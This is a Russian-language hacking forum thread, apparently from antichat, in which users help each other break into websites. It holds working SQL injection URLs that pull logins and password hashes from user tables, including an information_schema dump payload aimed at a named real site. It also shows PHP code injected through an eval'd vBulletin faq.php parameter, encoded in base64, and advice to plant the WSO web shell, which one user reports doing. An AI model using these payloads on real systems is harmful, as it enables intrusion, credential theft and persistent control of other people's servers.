Ваши вопросы по уязвимостям.

пробуй UNION ALL SELECT 1,2

 

результат тоже

c error based буду разбираться ибо новичок в sql пока

 

Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?

 

Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+user+limit+0,1/*

вывод будет логин/хеш

или так
index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+limit+0,1/*

вывод будет такой же

 

В других параметрах

_http://mastiff-dog.com/index.php?PageT=ForSale&act=&CatID=-1+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

 

пытаюсь создать файл

Powered by vBulletin® Version 3.8.5

file_put_contents('lala.php', '<? echo 50/2; ?>');

allow_url_include=Off
disable_functions=no value
magic_quotes_gpc=On


http://www.site.com/forum/faq.php?cmd=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

выводит

Fatal error: Call to undefined function bas64_decode() in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

что можно еще сделать?

 

er9j6@

base64_decode

 

http://www.site.com/forum/faq.php?cmd=base64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==

все равно выводит

404 - Компонент не найден!

 

2er9j6@,
vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)

 

а это как, научите?

 

Скачать запакованную версию WSO

Скопируй оттуда код, вставь его туда, где ты вставил код в faq.php. Потом http://forum/faq.php => ??? => PROFIT!

UPD. И да, убери <?php и ?>.

 

А зачем такая конструкция base64_decode($_GET[a])?
Засунь шифровку в base64_decode, гет зачем?

 

так тоже не проходит

http://www.site.com/forum/faq.php?cmd=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==);

ответ

Parse error: syntax error, unexpected ')' in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

 

Залил. Спасибо, Ereee

 

MQ on

 

Он уже про другой сайт =)

 

какой еще другой? последний пост с данными тут

http://forum.antichat.ru/showpost.php?p=3004839&postcount=19408

 

Ну так через админку VB вроде пофиг на MQ.


P.S. Стереть все посты вообщем...

 

О.о разница в чем? он передает данные через Mетод GET, и mq включено, интерпретатор одобряет админку или как?

никакой разницы

 

Зачем там мучатся с MQ, если в админке булки можно сразу сохранить другой код, чтоб всего этого не было. А с GET-ом ясно, я не это имел ввиду.


P.S. Я с UK. Сорри фор май Рашн